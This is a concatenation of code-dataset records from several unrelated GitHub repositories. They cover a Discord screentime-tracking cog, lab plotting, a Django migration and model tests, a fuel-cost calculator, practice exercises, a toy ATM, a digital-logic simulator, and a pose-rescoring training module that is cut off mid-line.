os\nimport plotly.express as px\nfrom utilities.managers import Wrench, Context, Writing\nfrom utilities.general import cMember\nfrom utilities.general import async_executor\nfrom utilities.lair import Lair\nfrom typing import Final, Literal, Optional, List\nfrom discord import Member, Guild, Embed, User, File\nfrom discord.ext.commands import group, command, Author, cooldown, BucketType\nfrom time import mktime\nfrom datetime import datetime\nif not os.path.exists('./data/new_status'):\n os.makedirs('./data/new_status')\n\nDayType: Final = Literal[30, 13, 6, 0]\n\ndef Percent(first: int, second: int, integer: bool = False) -> float | int:\n percentage = (first / second * 100)\n if integer is True:\n return round(float(percentage), 2)\n return percentage\n\n\ndef GenerateChart(data: List, member: Member, days: DayType):\n dataset = [i for i in data if (datetime.now() - datetime.fromisoformat(i[5])).days <= days]\n online = round(sum([i[1] for i in dataset])/60/60, 2)\n idle = round(sum([i[2] for i in dataset])/60/60, 2)\n dnd = round(sum([i[3] for i in dataset])/60/60, 2)\n offline = round(sum([i[4] for i in dataset])/60/60, 2)\n dataset = [dataset[0][0], online, idle, dnd, offline, dataset[0][5]]\n\n total_ = sum(dataset[1:5])\n\n names = [f'Online
<br>{online} Hours<br>{Percent(dataset[1], total_, True)}%',\n            f'Idle<br>{idle} Hours<br>{Percent(dataset[2], total_, True)}%',\n            f'DND<br>{dnd} Hours<br>{Percent(dataset[3], total_, True)}%',\n            f'Offline<br>{offline} Hours<br>
{Percent(dataset[4], total_, True)}%']\n \n px.defaults.width = 829\n px.defaults.height = 625\n\n figure = px.pie(\n values = dataset[1:5],\n hole = 0.60,\n names = names,\n color = names,\n color_discrete_map={\n names[0]: '#43b581',\n names[1]: '#faa61a',\n names[2]: '#f04747',\n names[3]: '#747f8d'\n \n },\n )\n\n figure.update_traces(textinfo='none')\n figure.update_layout(paper_bgcolor='rgba(0,0,255,0)', legend_font_color='#FFFFFF', legend_font_size=24, legend_tracegroupgap=15)\n file = f\"{str(member)}-{int(mktime(datetime.now().timetuple()) * 1000)}.png\"\n figure.write_image(f'./data/new_status/{file}')\n return file\n\n\nclass Screentime(Wrench):\n\n @Wrench.listener(name='on_member_update')\n async def screentime_member_update(self: \"Screentime\", before: Member, after: Member):\n if before.bot or not before.guild or before == self.bot.user:\n return\n if before.status != after.status:\n now = datetime.now()\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO NOTHING\n \"\"\",\n after.id, 0, 0, 0, 0, str(now)\n )\n DATASET = [\n i for i in await self.bot.db.fetch(\n \"SELECT * FROM screentime WHERE user_id = $1\",\n before.id\n ) if (datetime.now() - datetime.fromisoformat(i[5])).days <= 30\n ]\n try:\n sort = sorted(\n map(\n list, DATASET\n ),\n key=lambda x: datetime.fromisoformat(x[5]),\n reverse=True\n )[0]\n except:\n raise\n\n online, idle, dnd, offline = 0, 0, 0, 0\n status = before.status.name\n time = datetime.fromisoformat(sort[5])\n new_time: datetime.timedelta = (now - time)\n\n if status == 'online':\n online += new_time.seconds\n\n elif status == 'idle':\n idle += new_time.seconds\n \n elif status == 'dnd':\n dnd += new_time.seconds\n \n elif status == 'offline':\n offline += new_time.seconds\n \n if any([online, idle, dnd, offline]):\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO UPDATE SET online = screentime.online + $2, idle = screentime.idle + $3, dnd = screentime.dnd + $4, offline = screentime.offline + $5, time = $6\n \"\"\",\n before.id, online, idle, dnd, offline, str(now)\n )\n\n @Wrench.listener(name='on_presence_update')\n async def screentime_presence_update(self: \"Screentime\", before: User, after: User):\n if before.bot or not before.guild or before == self.bot.user:\n return\n\n if before.status != after.status:\n now = datetime.now()\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO NOTHING\n \"\"\",\n after.id, 0, 0, 0, 0, str(now)\n )\n DATASET = [\n i for i in await self.bot.db.fetch(\n \"SELECT * FROM screentime WHERE user_id = $1\",\n before.id\n ) if (datetime.now() - datetime.fromisoformat(i[5])).days <= 30\n ]\n try:\n sort = sorted(\n map(\n list, DATASET\n ),\n key=lambda x: datetime.fromisoformat(x[5]),\n reverse=True\n )[0]\n except:\n raise\n\n online, idle, dnd, offline = 0, 0, 0, 0\n status = before.status.name\n time = datetime.fromisoformat(sort[5])\n new_time: datetime.timedelta = (now - time)\n\n if status == 'online':\n online += new_time.seconds\n\n elif status == 'idle':\n idle += new_time.seconds\n \n elif status == 'dnd':\n dnd += new_time.seconds\n \n elif status == 'offline':\n offline += new_time.seconds\n \n if any([online, idle, dnd, offline]):\n await self.bot.db.execute(\n 
\"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO UPDATE SET online = screentime.online + $2, idle = screentime.idle + $3, dnd = screentime.dnd + $4, offline = screentime.offline + $5, time = $6\n \"\"\",\n before.id, online, idle, dnd, offline, str(now)\n )\n\n\n @command(name='screentime', aliases=['st', 'screen'], brief='Shows screentime of a member')\n @cooldown(1, 5, BucketType.member)\n async def screentime(self: \"Screentime\", ctx: Context, member: cMember | Member | User = Author):\n async with ctx.typing():\n data = await self.bot.db.fetch(\n \"\"\"\n SELECT * FROM screentime WHERE user_id = $1\n \"\"\",\n member.id\n )\n if not data:\n return await ctx.warn(\"No data found for this member\")\n\n now = datetime.now()\n DATASET = [\n i for i in data if (now - datetime.fromisoformat(i[5])).days <= 30\n ]\n munch = sorted(\n map(list, DATASET),\n key=lambda x: datetime.fromisoformat(x[5]),\n reverse=True\n )\n online = round(sum([i[1] for i in munch])/60/60, 2)\n idle = round(sum([i[2] for i in munch])/60/60, 2)\n dnd = round(sum([i[3] for i in munch])/60/60, 2)\n offline = round(sum([i[4] for i in munch])/60/60, 2)\n\n if not any([online, idle, dnd, offline]):\n return await ctx.warn(\"No data **found** for this member\")\n \n chart = await self.bot.loop.run_in_executor(None, GenerateChart, data, member, 31)\n \n file = File(f'./data/new_status/{chart}', filename=\"pie.png\")\n\n await ctx.reply(files=[file])\n\n try:\n await asyncio.sleep(4)\n os.remove(f'./data/new_status/{chart}')\n except:\n raise\n\n\nasync def setup(bot: Lair) -> None:\n await bot.add_cog(Screentime(bot=bot))","repo_name":"hifthot/skidcity","sub_path":"lair/cogs/screentime.py","file_name":"screentime.py","file_ext":"py","file_size_in_byte":8629,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"70500312485","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom uncertainties import ufloat\n\nI,U = np.genfromtxt('Daten/c.txt',unpack= True)\nU2,I2 = np.genfromtxt('Daten/c2.txt',unpack= True)\n\nI2m = np.mean(I2)\nN = 27\ndI2 = np.sqrt(N/(N-1)*np.mean((I2-I2m)**2))\nI2w = ufloat(I2m,dI2)\n\nx = np.linspace(-23,23)\nplt.plot(x,0*x+I2m,'r-', label = r'Mittelwert Gegenstrom')\nplt.plot((0,0),(-0.3,8), 'b--', label = r'Bremsspannung')\nplt.plot(I,U,'kx',label=r'Messwerte')\n\nprint('Mittelwert Ig:',I2w)\n\nplt.legend(loc='best')\nplt.ylim(-0.4, 7)\nplt.xlim(-20,20)\nplt.grid()\nplt.xlabel(r'$U/\\si{\\volt}$')\nplt.ylabel(r'$I/\\si{\\nano\\ampere}$')\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\nplt.savefig('build/c.pdf')\n","repo_name":"JLammering/Physikalisches-Praktikum","sub_path":"25 Photoeffekt/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24321951108","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('async_notifications', '0002_auto_20160515_0018'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TemplateContext',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('code', models.CharField(verbose_name='Code', max_length=50)),\n ('context_dic', models.TextField(verbose_name='Context dictionary')),\n ],\n options={\n 
'verbose_name': 'Context of template',\n 'verbose_name_plural': 'Context of template',\n },\n ),\n ]\n","repo_name":"Solvosoft/async_notifications","sub_path":"async_notifications/migrations/0003_templatecontext.py","file_name":"0003_templatecontext.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"11910963429","text":"#calculates gas consumption, prices and carbon footprint \r\nimport pandas as pd\r\nimport datetime\r\nimport calendar\r\n\r\ncarEff = 9.78 #Kilometres/Litre for a 2011 ford escape 4 cyl, auto 6 speed from fuelexonomy.gov\r\nplaneEff = 3.2 #industry average of litres per km per passenger \r\nvehCarbEff = 2.35 #average kg of carbon dioxide per litre of gas consumed \r\nplaneCarbEff = 3.15 #average kg of CO2 per litre of jet fuel consumed\r\n\r\ndef fuelUsed(disTotal): #finds litres of gas used in a car that month\r\n carLitres = disTotal/carEff\r\n return carLitres\r\n\r\ndef planeFuelUsed(planeTotal): #finds litres of gas used in a plane that month\r\n planeLitres = planeEff*planeTotal\r\n return planeLitres\r\n\r\ndef carbonUsed(vehLitres, planeLitres): #finds total carbon output that month\r\n vehCarb = vehCarbEff*vehLitres \r\n planeCarb = planeCarbEff*planeLitres\r\n totalCarb = vehCarb + planeCarb\r\n return totalCarb\r\n\r\n#returns cost of gas for selected month based on approximate gas used and average gas price for that month in Vancvouer, BC\r\ndef gasPrices(month, year, vehLitres):\r\n month = month.capitalize()\r\n month = month[:3] #taking first three chars of the motnh to match the monthDic\r\n\r\n gasPriceDic = dict()\r\n monthDic = {month: index for index, month in enumerate(calendar.month_abbr) if month} #creats a dictionary with months as keys, numbers as values\r\n argDateKey = year + '-' + str(monthDic[month]) #key to be used is gasPriceDic. 
matches dateKey\r\n\r\n #excel sheet import\r\n data = pd.read_excel(r'C:\\Users\\fitcr\\MyPythonScripts\\py4e\\GoogleMaps API\\gasPricesVan.xlsx')\r\n df = pd.DataFrame(data, columns=['Month', 'Price']) #create data frame\r\n\r\n #creats a dictionary with year-month as keys and prices as values\r\n for row in df.itertuples(): #iterates through each row of the dataframe\r\n exMonth = row.Month\r\n price = row.Price\r\n datee = datetime.datetime.strptime(str(exMonth), '%Y-%m-%d %H:%M:%S') #converts to easier to use datetime\r\n dateKey = str(datee.year) + '-' + str(datee.month) #creates year-month key for dictionary\r\n gasPriceDic[dateKey] = (price/100) #adds to dic\r\n\r\n gasPrice = gasPriceDic[argDateKey]\r\n totalCost = gasPrice*vehLitres\r\n return totalCost\r\n\r\n\r\n\r\n","repo_name":"brysonorth/Maps-Timeline-Data","sub_path":"fuelData.py","file_name":"fuelData.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29503092861","text":"# %% Q1)\nfrom itertools import count\n\nfrom macpath import join\n\n\ndef find_the_difference(s, t):\n sum_s, sum_t = 0, 0\n if len(s)==0: return t\n for i in s:\n sum_s += ord(i)\n for i in t:\n sum_t += ord(i)\n\n return chr(sum_t - sum_s)\n\nprint(find_the_difference('abcd', 'abcde'))\nprint(find_the_difference('', 'y'))\nprint(find_the_difference('ae', 'aea'))\n# %% Q2)\n\n#[int, str, bool, list, tuple, dictionary]\n\ndef count_datatypes(*args):\n dt = {\n int:0,\n str:0,\n bool:0,\n list:0,\n tuple:0,\n dict:0\n }\n for i in list(args):\n dt[type(i)] += 1\n return list(dt.values())\n\nprint(count_datatypes(1,45,'HI', False))\nprint(count_datatypes([10, 20], (\"t\", \"Ok\"), 2, 3, 1))\nprint(count_datatypes(\"Hello\", \"Bye\", True, True, False, {\"1\": \"One\", \"2\": \"Two\"}, [1,\n3], {\"Brayan\": 18}, 25, 23))\nprint(count_datatypes(4, 21, (\"ES\", \"EN\"), (\"a\", \"b\"), False, [1, 2, 3], [4, 5, 6]))\n# %% Q3)\ndef fib_str(n, chars):\n ans = [chars[0], chars[1]]\n for i in range(2,n):\n ans.append(ans[i-1] + ans[i-2])\n print(', '.join(ans))\n\nfib_str(3, [\"j\", \"h\"]) \nfib_str(5, [\"e\", \"a\"]) \nfib_str(6, [\"n\", \"k\"]) \n# %%Q4)\ndef ones_threes_nines(num):\n ans = {\n 'nines':0,\n 'threes':0,\n 'ones':0\n }\n n = num\n while n>0:\n if n>=9:\n ans['nines'] += 1\n n = n- 9\n elif n>=3:\n ans['threes'] += 1\n n = n - 3\n else:\n ans['ones'] += 1\n n = n - 1\n print(ans)\n\nones_threes_nines(10)\nones_threes_nines(15)\nones_threes_nines(22)\n\n\n# %% Q5)\ndef fib(n):\n if n==0: return 0\n a, b = 0, 1\n for i in range(2,n):\n c = a + b\n a = b\n b = c\n \n return a+b\n\nprint(fib(5))\nprint(fib(2))\nprint(fib(7))\nprint(fib(8))\nprint(fib(9))\n\n# %%\n","repo_name":"krisskrosscode/Python_practice_projects","sub_path":"iNeuron_py_ass/adv_ass_06.py","file_name":"adv_ass_06.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5729744245","text":"import csv\n\ndataset_1 = []\ndataset_2 = []\n\nwith open(\"1.csv\", \"r\") as f:\n csv_reader = csv.reader(f)\n\n for row in csv_reader:\n dataset_1.append(row)\n\nwith open(\"2_sorted_new.csv\", \"r\") as f:\n csv_reader = csv.reader(f)\n\n for row in csv_reader:\n dataset_2.append(row)\n\nheaders_1 = dataset_1[0]\nplanet_data_1 = dataset_1[1:]\n\nheaders_2 = dataset_2[0]\nplanet_data_2 = dataset_2[1:]\n\nmain_headers = headers_1 + headers_2\nmain_planet_data = []\n\nfor index, data in 
enumerate(planet_data_1):\n main_planet_data.append(planet_data_1[index] + planet_data_2[index])\n\nwith open(\"final_space.csv\", \"a+\") as f:\n csv_writer = csv.writer(f)\n csv_writer.writerow(main_headers)\n csv_writer.writerows(main_planet_data)","repo_name":"Alien178/Python-Projects","sub_path":"WhiteHatJr_Python_Projects/ICP - Data Pre-Processing/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30328005564","text":"def atm():\n print(\"1-Cash Withdraw 2-Cash Deposit\\n3-Set Pin 4-Check Balance\")\n n = (input())\n if n == '1':\n def cashwithdraw():\n print(\"How Much Money You Want To Withdraw\")\n n1 = int(input())\n print(n1,\"₹ Rupees Has Been Deducted From your Account\")\n cashwithdraw()\n elif n == '2':\n def cashdeposit():\n print(\"How Much Money You Want To Deposit\")\n n1 = int(input())\n print(n1, \"₹ Rupees Has Been Added in your Account\")\n cashdeposit()\n elif n == '3':\n def setpin():\n print(\"Set Your Pin No\")\n n1 = int(input())\n print(\"Your Pin No is =\",n1)\n setpin()\n elif n == '4':\n def checkbalance():\n print(\"Total Balance =1000000000000000000₹\")\n checkbalance()\nwhile True:\n atm()\n\n","repo_name":"sangampatel/pythonproject","sub_path":"pythonproject/basicatm.py","file_name":"basicatm.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23704848790","text":"\"\"\"\n=============================================================\nc:/1work/Python/djcode/tfat/tfat/tests/test_joepublic_model.py\nCreated: 18 Jun 2015 12:05:51\n\n\nDESCRIPTION:\n\nTests of the methods associated with the tag report model.\n\nA. Cottrill\n=============================================================\n\"\"\"\n\nimport pytz\nfrom tfat.models import Recovery\n\nfrom tfat.tests.factories import *\n\nimport pytest\n\n\n@pytest.fixture()\ndef db_setup():\n\n report_date = datetime(2010, 10, 10).replace(tzinfo=pytz.UTC)\n species = SpeciesFactory()\n\n angler1 = JoePublicFactory.create(\n first_name=\"Homer\",\n last_name=\"Simpson\",\n address1=\"742 Evergreen Tarrace\",\n address2=\"Box 123\",\n town=\"Springfield\",\n province=\"Ontario\",\n postal_code=\"N0W2T2\",\n email=\"hsimpson@hotmail.com\",\n phone=\"555-321-1234\",\n )\n\n angler2 = JoePublicFactory.create(first_name=\"Montgomery\", last_name=\"Burns\")\n\n # report filed by Homer\n report = ReportFactory(reported_by=angler1, report_date=report_date)\n tagids = [\"111111\", \"222222\", \"333333\"]\n for tag in tagids:\n recovery = RecoveryFactory(report=report, species=species, tagid=tag)\n\n # a report filed by Monty Burns\n report = ReportFactory(reported_by=angler1, follow_up=True, report_date=report_date)\n\n tagids = [\"4444\", \"5555\"]\n for tag in tagids:\n recovery = RecoveryFactory(report=report, species=species, tagid=tag)\n\n\n@pytest.mark.django_db\ndef test_str_complete():\n \"\"\"if an angler (joe public) has both first name and an initial, the\n __str__ should return {first_name} {initial}. {last_name}\"\"\"\n\n names = {\"first_name\": \"Homer\", \"initial\": \"J\", \"last_name\": \"Simpson\"}\n\n angler = JoePublicFactory(\n first_name=names.get(\"first_name\"),\n initial=names.get(\"initial\"),\n last_name=names.get(\"last_name\"),\n )\n\n should_be = \"{first_name} {initial}. 
{last_name}\"\n assert str(angler) == should_be.format(**names)\n\n\n@pytest.mark.django_db\ndef test_str_no_initial():\n \"\"\"if an angler (joe public) has both first name and an initial, the\n __str__ should return {first_name} {last_name}\"\"\"\n\n names = {\"first_name\": \"Homer\", \"last_name\": \"Simpson\"}\n\n angler = JoePublicFactory(\n first_name=names.get(\"first_name\"),\n initial=None,\n last_name=names.get(\"last_name\"),\n )\n should_be = \"{first_name} {last_name}\"\n\n assert str(angler) == should_be.format(**names)\n\n\n# @pytest.mark.django_db\n# def test_str_last_name_only():\n# '''if an angler (joe public) only has a last_name, the\n# __str__ method should return just the last_name'''\n#\n# names = {'last_name':'Simpson'}\n#\n# angler = JoePublicFactory(first_name=None,\n# initial=None,\n# last_name=names.get('last_name'))\n# assert str(angler) == names['last_name']\n\n\n@pytest.mark.django_db\ndef test_joepublic_report_count(db_setup):\n \"\"\"the report count() method of a JoePublic object should be the number\n of tag reports they have filed.\n \"\"\"\n # homer has 2 reports, monty has 0\n\n homer = JoePublic.objects.get(first_name=\"Homer\")\n assert homer.report_count() == 2\n\n monty = JoePublic.objects.get(first_name=\"Montgomery\")\n assert monty.report_count() == 0\n\n\n@pytest.mark.django_db\ndef test_joepublic_tag_count(db_setup):\n \"\"\"the tag_count() method of a JoePublic object should be the number\n of tags tehy have reported (summed across all reports)\n \"\"\"\n # homer has 5 tags, monty has 0\n\n homer = JoePublic.objects.get(first_name=\"Homer\")\n assert homer.tag_count() == 5\n\n monty = JoePublic.objects.get(first_name=\"Montgomery\")\n assert monty.tag_count() == 0\n","repo_name":"AdamCottrill/TFAT","sub_path":"tfat/tests/test_joepublic_model.py","file_name":"test_joepublic_model.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39078769153","text":"\"\"\"Module containg abstractions which are used to implement digital logic. The objects in this module aren't physical entities as much as concepts in digital logic\"\"\"\n\nfrom collections import defaultdict, namedtuple, deque\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass Wire:\n \"\"\"\n Wire represents a bit of data. 
Changes to Wire create Events which\n are notified to updater.\n\n Wires are immutable therefore they are the correct candidates for event\n generation.\n \n Wire must be assigned an instance of Updater before use.\n If auto_update is True, Wire will call updater.update() every time\n a set is made\n \"\"\"\n Event = namedtuple('Event', ('obj'))\n updater = None\n auto_update = True\n def __init__(self, bit=0):\n self._bit = 0\n self.bit = bit\n\n def __repr__(self):\n s = '{}: bit={}; id={}'\n return s.format(self.__class__, self.bit, id(self))\n\n @property\n def bit(self):\n return self._bit\n \n def __repr__(self):\n s = '{}: bit={}; id={}'\n return s.format(self.__class__, self.bit, id(self))\n\n\n @bit.setter\n def bit(self, value):\n if self._bit == value:\n return\n self._bit = value\n event = self.Event(self)\n self.updater.notify(event)\n if not self.updater.updating and self.auto_update:\n self.updater.update()\n \nclass StaticWire:\n \"\"\"\n Like wire but does not support assignment.\n Used exclusively for Bus.vdd and Bus.gnd.\n \"\"\"\n def __init__(self, bit):\n self._bit = bit\n\n @property\n def bit(self):\n return self._bit\n \n @bit.setter\n def bit(self, value):\n e = TypeError('StaticWire does not support assignment')\n logger.exception(e)\n raise e\n\nclass Signal:\n \"\"\"\n Signal abstracts digital signals and is used to set values on a Bus.\n Signal provides an API to deal with digital signals. The data carried by\n a Bus is encoded as a Signal. Signal provides methods to perform logical operations\n that take Signal objects as operands and return a new instace of Signal.\n \"\"\"\n def __init__(self, value, size):\n if type(value) is int:\n self.value = value\n else:\n msg = 'Argument of type {} to {}. Must be an Integer'\n e = TypeError(msg.format(type(value), self.__class__))\n logger.exception(e)\n raise e\n self._size = size\n logger.debug(repr(self))\n\n @classmethod\n def from_wires(cls, wires):\n \"\"\"Initialize a signal object from a list of wires\"\"\"\n sig = 0\n for i, wire in enumerate(wires):\n sig |= wire.bit << i\n return cls(sig, len(wires))\n \n @property\n def bits(self):\n \"\"\"Convert value into a sequence of 0s and 1s, essentially\n a list with its binary representation.\n The 0th element of the sequence represents the 0th bit.\"\"\"\n return tuple(self.value >> i & 0x1 for i in range(self._size))\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __repr__(self):\n s = '{}: value={};'\n return s.format(self.__class__, hex(self.value))\n \n def __int__(self):\n return self.value\n \n def __str__(self):\n return hex(self.value)\n\n def complement(self):\n return Signal.NOT(self)\n \n @classmethod\n def NOT(cls, a):\n mask = 0\n for i in range(a._size):\n mask |= 1 << i\n value = ~a.value & mask\n return cls(value, a._size)\n\n @classmethod\n def OR(cls, a, b):\n value = a.value | b.value\n return cls(value, a._size)\n\n @classmethod\n def AND(cls, a, b):\n value = a.value & b.value\n return cls(value, a._size)\n\n @classmethod\n def XOR(cls, a, b):\n value = a.value ^ b.value\n return cls(value, a._size)\n\nclass Updater:\n \"\"\"\n Implementation of the Observer design pattern.\n\n Signal carriers in PDD are Wires. Any Wire that suffers a change will notify\n Updater of the event. A BaseCircuit is depedent on a group of Wires, meaning\n that any change made to those wires will change the circuit. 
Circuits then \n subscribe to Updater to be updated upon Wire changes.\n\n Handling events, presumably, begins a cascate of events by making changes\n to others Wires which notifies of further events. Updater's job for the cycle\n is done when no new events are generated by an update call.\n\n There is a maximum threshold (default 2**10, change within init) to Updater's number \n of calls per cycle in order to avoid deadlocks caused by improper circuits\n (e.g. unstable circuits or circuits with cyclic paths)\n \"\"\"\n def __init__(self, threshold=2**16):\n logger.info('Updater object created')\n self.auto_update = True\n self.threshold = threshold\n self.updating = False\n self.events = []\n self.relations = defaultdict(list)\n\n\n def subscribe(self, circuit, wires):\n \"\"\"The subscribed circuit will be updater when an event is sourced by \nany wire in wires\"\"\"\n logger.debug('Subscribed {} to {}'.format(circuit, len(wires)))\n for wire in wires:\n self.relations[id(wire)].append(circuit)\n\n def unsubscribe(self, circuit, wires):\n \"\"\"Circuit will no longer be updated upon change made to wire in wires\"\"\"\n for wire in wires:\n logger.debug('Unsubscribed {} from {}'.format(circuit, len(wires)))\n try:\n self.relations[id(wire)].remove(circuit)\n except ValueError:\n pass\n\n def notify(self, event):\n \"\"\"Notifies Updater of new event, adds it to list of events\"\"\"\n logger.debug('New Updater event: ' + repr(event))\n self.events.append(event)\n \n def update(self):\n \"\"\"Handle all events from this cycle until list is empty or threshold blows up.\n\n Handle all events in self.events. Events are handled in a FIFO manner\n and handling events is likely to cause more events to be generated.\n\n If the number of events in the cycle exceed threshold, raises a Runtime error\n with the last circuits handled.\n \"\"\"\n #should change to a Breadth first algorithm\n logger.info('Handling events')\n self.updating = True\n deque_len = 50\n last = deque([None]*deque_len, maxlen=deque_len)\n for i in range(self.threshold):\n try:\n event = self.events.pop(0)\n except IndexError:\n self.updating = False\n break\n logger.debug('Handling event {}'.format(event))\n for circuit in self.relations[id(event.obj)]:\n last.append(circuit)\n logger.debug('updating circuit {}'.format(circuit))\n circuit.update()\n else:\n self.updating = False\n error_str = 'Update threshold blew up; check for cyclic path.'\n error = RuntimeError(error_str, last)\n raise error\n","repo_name":"Lodek/pdd","sub_path":"pdd/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30346321689","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport pickle\nimport models\nfrom pycocotools.cocoeval import COCOeval as COCOEval\nfrom crowdposetools.cocoeval import COCOeval as CrowdposeEval\n\nJOINT_COCO_LINK_1 = [0, 0, 1, 1, 2, 3, 4, 5, 5, 5, 6, 6, 7, 8, 11, 11, 12, 13, 14]\nJOINT_COCO_LINK_2 = [1, 2, 2, 3, 4, 5, 6, 6, 7, 11, 8, 12, 9, 10, 12, 13, 14, 15, 16]\n\nJOINT_CROWDPOSE_LINK_1 = [12, 13, 13, 0, 1, 2, 3, 0, 1, 6, 7, 8, 9, 6, 0]\nJOINT_CROWDPOSE_LINK_2 = [13, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 7, 1]\n\n\n# Data process for the RescoreNet\ndef read_rescore_data(cfg):\n train_file = cfg.RESCORE.DATA_FILE\n num_joints = 
cfg.DATASET.NUM_JOINTS\n x_train, y_train = get_joint(train_file, num_joints)\n feature_train = get_feature(x_train, cfg.DATASET.DATASET)\n return feature_train, y_train\n\n\ndef get_joint(filename, num_joints):\n obj = pickle.load(open(filename, \"rb\"))\n\n posx, posy = [], []\n for i in range(1, len(obj)):\n pose = list(np.concatenate(\n (obj[i][0], obj[i][1]), axis=1).reshape(3*num_joints))\n posx.append(pose)\n if obj[i][2] == 1:\n obj[i][2] = 0\n posy.append(obj[i][2])\n\n x = np.array(posx)\n y = np.array(posy)\n\n x = x.reshape((-1, num_joints, 3))\n y = torch.tensor(y.reshape((-1, 1)), dtype=torch.float)\n return x, y\n\n\ndef get_feature(x, dataset):\n joint_abs = x[:, :, :2]\n vis = x[:, :, 2]\n\n if 'coco' in dataset:\n joint_1, joint_2 = JOINT_COCO_LINK_1, JOINT_COCO_LINK_2\n elif 'crowd_pose' in dataset:\n joint_1, joint_2 = JOINT_CROWDPOSE_LINK_1, JOINT_CROWDPOSE_LINK_2\n else:\n raise ValueError(\n 'Please implement flip_index for new dataset: %s.' % dataset)\n\n #To get the Delta x Delta y\n joint_relate = joint_abs[:, joint_1] - joint_abs[:, joint_2]\n joint_length = ((joint_relate**2)[:, :, 0] +\n (joint_relate**2)[:, :, 1])**(0.5)\n\n #To use the torso distance to normalize\n normalize = (joint_length[:, 9]+joint_length[:, 11])/2\n normalize = np.tile(normalize, (len(joint_1), 2, 1)).transpose(2, 0, 1)\n normalize[normalize < 1] = 1\n\n joint_length = joint_length/normalize[:, :, 0]\n joint_relate = joint_relate/normalize\n joint_relate = joint_relate.reshape((-1, len(joint_1)*2))\n\n feature = [joint_relate, joint_length, vis]\n feature = np.concatenate(feature, axis=1)\n feature = torch.tensor(feature, dtype=torch.float)\n return feature\n\n\n# Train and Valid for RescoreNet\ndef rescore_fit(cfg, model, x_data, y_data):\n loss_fn = nn.MSELoss(reduction='mean')\n train_losses = []\n\n optimizer = torch.optim.Adam(model.parameters(), lr=cfg.RESCORE.LR)\n\n x_data = Variable(x_data, requires_grad=True)\n y_data = Variable(y_data, requires_grad=True)\n\n save_final_model_file = cfg.RESCORE.MODEL_FILE\n for epoch in range(cfg.RESCORE.END_EPOCH):\n train_loss = train_core(x_data, y_data, optimizer, model,\n loss_fn, cfg.RESCORE.BATCHSIZE)\n train_losses.append(train_loss)\n\n if epoch % 1 == 0:\n print(\"step:\", epoch+1, \"train_loss:\", train_loss)\n\n torch.save(model.state_dict(), save_final_model_file)\n return train_losses\n\n\ndef train_core(x_data, y_data, optimizer, model, loss_fn, batchsize):\n datasize = len(x_data)\n loss_sum = 0\n index = np.arange(datasize)\n np.random.shuffle(index)\n for i in range(int(datasize/batchsize)):\n x_temp = x_data[index[i*batchsize:(i+1)*(batchsize)]]\n y_temp = y_data[index[i*batchsize:(i+1)*(batchsize)]]\n model.train()\n optimizer.zero_grad()\n y_pred = model(x_temp)\n\n loss = loss_fn(y_pred, y_temp)\n loss.backward()\n optimizer.step()\n loss_sum += loss.item()\n\n return loss_sum/int(datasize/batchsize)\n\n\ndef rescore_valid(cfg, temp, ori_scores):\n temp = np.array(temp)\n\n feature = get_feature(temp, cfg.DATASET.DATASET)\n feature = feature.cuda()\n\n PredictOKSmodel = eval('models.'+'predictOKS'+'.get_pose_net')(\n cfg, feature.shape[1], is_train=False\n )\n pretrained_state_dict = torch.load(cfg.RESCORE.MODEL_FILE)\n need_init_state_dict = {}\n for name, m in pretrained_state_dict.items():\n need_init_state_dict[name] = m\n PredictOKSmodel.load_state_dict(need_init_state_dict, strict=False)\n PredictOKSmodel = torch.nn.DataParallel(\n PredictOKSmodel, device_ids=cfg.GPUS).cuda()\n PredictOKSmodel.eval()\n\n scores = 
